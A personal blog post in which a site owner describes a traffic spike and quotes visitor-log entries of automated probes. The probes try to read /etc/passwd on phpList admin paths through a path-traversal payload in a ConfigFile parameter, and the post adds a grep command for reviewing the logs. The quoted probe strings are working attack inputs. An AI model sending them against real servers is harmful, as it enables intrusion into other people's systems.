Buy Me A Soda
User
- Log in
- Entries RSS
- Comments RSS
- WordPress.org
- Powered by AmazonSimpleAdmin
Deals of the Day
Visitor Statistics
Attempted Hack on My Site?! Really?!
Exponentially increased traffic?
So I logged in to my site today and noticed my traffic had spiked exponentially! Check out the screenshot of the bar graph (showing yesterday and today for comparison). 300 visitors and 3000 pageviews in a single day? On my humble little website? Way too good to be true!
So I looked further and found some unsettling info in the visitor statistics… It looked something like this:
14:38:08 //lists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd 14:38:09 //newsletter/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd 14:38:10 //news/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd 14:38:10 //phplist/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd 14:38:11 //phpList/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd 14:38:12 //admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd 14:38:13 //phplist/lsts/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd 14:38:14 //phplists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd 14:38:14 //list/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwdLooks like someone was trying to pull a RFI — Remote File Inclusion — attack on my site…
Next I checked my logs:
cat /var/www/logs/*.log | grep '\.\.\/\.\.\/' > /tmp/rfi_attack.log cat /var/www/logs/*.logPosted in Updates | Tagged Bar Graph, Cat, Etc Passwd, General, Hack On, Hack Site, Inclusion, Newsletter Admin, Pageviews, Screenshot, Single Day, Traffic, Visitor Statistics, Www Logs, Yesterday And Today | Leave a comment
Search This Site
Archives
- March 2013 (1)
- June 2012 (2)
- March 2012 (1)
- July 2011 (3)
- June 2011 (3)
- May 2011 (2)
- April 2011 (3)
- March 2011 (12)
- February 2011 (8)
- October 2010 (11)
- August 2010 (5)
- July 2010 (1)
- June 2010 (1)
- April 2010 (1)
- February 2010 (1)
- January 2010 (21)
- October 2009 (2)
- September 2009 (2)
- June 2009 (1)
- May 2009 (2)
- April 2009 (1)
- March 2009 (1)
- January 2009 (1)
- December 2008 (1)
- October 2008 (1)
- February 2008 (1)
- January 2008 (1)
- December 2007 (4)

